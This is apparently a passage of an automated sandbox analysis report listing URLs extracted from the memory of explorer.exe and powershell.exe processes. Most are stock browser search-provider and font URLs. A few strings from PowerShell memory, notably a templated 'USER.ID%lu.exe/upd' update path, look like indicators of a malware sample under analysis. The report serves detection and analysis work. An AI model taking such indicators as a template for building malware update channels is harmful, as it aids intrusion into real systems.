Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 00000018.00000003.351645434.00000221A3020000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000018.00000003.351645434.00000221A3020000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000018.00000003.408278521.00000221A2B33000.00000004.00000001.sdmp, explorer.exe, 00000023.00000003.559957555.0000000008A05000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 00000018.00000003.351645434.00000221A3020000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000018.00000002.430783857.000002219A643000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000018.00000002.410423008.000002218A7EE000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000023.00000003.559813956.00000000089AA000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.microsRD8Et
Source: powershell.exe, 00000018.00000002.410155659.000002218A5E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000023.00000000.378969278.0000000006300000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000023.00000000.378969278.0000000006300000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000018.00000002.410423008.000002218A7EE000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000023.00000000.388592956.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000023.00000000.379685832.00000000063F3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
